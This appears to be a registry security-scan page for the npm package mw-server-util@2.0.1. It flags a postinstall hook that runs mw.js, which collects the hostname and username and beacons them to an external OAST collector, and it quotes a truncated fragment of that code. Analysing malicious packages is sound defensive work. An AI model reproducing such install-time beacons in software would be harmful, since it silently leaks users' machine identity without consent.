registry  /  mw-server-util  /  2.0.1

mw-server-util@2.0.1

DEMO

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installation triggers a hidden host-identification beacon. The package sends the local hostname and username to an external collector.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
npm install, through the postinstall lifecycle hook
Impact
Leaks local machine identity and username to an attacker-controlled endpoint during dependency installation.
Mechanism
install-time host fingerprinting and HTTPS exfiltration
Attack narrative
On installation, npm executes `mw.js` through `postinstall`. The script obtains `os.hostname()` and `os.userInfo().username`, adds package and timestamp metadata, then issues an HTTPS GET request to an external OAST collector. This is unconsented host-fingerprint exfiltration at install time; the error handler suppresses failures.
Rationale
Source inspection confirms concrete install-time collection and external transmission of local host identity data. The “DEMO” description does not remove the malicious behavior.
Evidence
package.jsonmw.js
Network endpoints1
gdx35zc4m7hymba6asotmwhd349vxlla.oastify.com/beacon

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` runs `node mw.js` via `postinstall`.
  • `mw.js` executes automatically during installation.
  • `mw.js` collects hostname and local username.
  • `mw.js` sends collected data to an external OAST endpoint.
  • Network errors are silently ignored after the beacon attempt.
Evidence against
  • No additional package files, binaries, or payload stages are present.
  • The script labels itself “DEMO,” but still performs real install-time collection and transmission.
Behavioral surface
Source
Network
Supply chain
HighEntropyStringsTrivialUrlStrings
Manifest
NoLicense
scanned 1 file(s), 415 B of source, external domains: gdx35zc4m7hymba6asotmwhd349vxlla.oastify.com

Source & flagged code

3 flagged · loading source
package.jsonView file
scripts.postinstall = node mw.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
1const os = require("os"), https = require("https"); L2: const COLLECTOR = "https://[redacted].oastify.com/beacon"; L3: const payload = new URLSearchParams({ L4: host: os.hostname(), user: os.userInfo().username, pkg: "mw-server-util", L5: ts: new Date().toISOString()
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

mw.jsView on unpkg · L1
matchType = malicious_source_fingerprint_signature signature = 0eb861226b817ec2 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = mw-server-util@2.0.0 matchedPath = mw.js matchedIdentity = npm:bXctc2VydmVyLXV0aWw:2.0.0 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

mw.jsView on unpkg

Findings

3 High1 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationmw.js
HighKnown Malware Source Fingerprint Signaturemw.js
MediumNetwork
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings
LowNo License